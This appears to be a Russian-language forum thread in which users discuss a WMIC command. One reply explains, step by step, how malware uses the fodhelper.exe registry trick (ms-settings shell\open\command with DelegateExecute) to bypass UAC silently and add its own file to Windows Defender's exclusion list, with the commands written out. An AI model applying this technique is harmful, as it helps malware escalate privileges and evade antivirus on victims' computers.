Вот эта команда: WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"' + excludeDir + '\".
это понятно --- Сообщение объединено с предыдущим 3 сен 2021 он работает только в powershell? --- Сообщение объединено с предыдущим 3 сен 2021 или cmd
чёт с дефендером связано. Хуе его знает. По крайне мере это к данному разделу не имеет вообще никакого отношения. мб
dev1lteam, а загуглить мозгов не хватает? Для этого достаточно занести часть кода в поисковик Гугл или любого другого... Куча инфы по данному вопросу. ---- 1) Создаётся значение в реестре HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command "DelegateExecute"=0 Код HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command "DelegateExecute"=0 Оно необходимо для обхода контроля учетных записей. 2) Создаётся значение HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command Код HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command указывающее на команду, которая занесёт путь к вредоносному файлу в «белый список». Вот эта команда: WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"' + excludeDir + '\". Код WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"' + excludeDir + '\". 3) Выполняется C:\Windows\System32\fodhelper.exe Код C:\Windows\System32\fodhelper.exe что запускает вышеозначенную WMIC-команду. При этом никаких уведомлений со стороны UAC не выводится.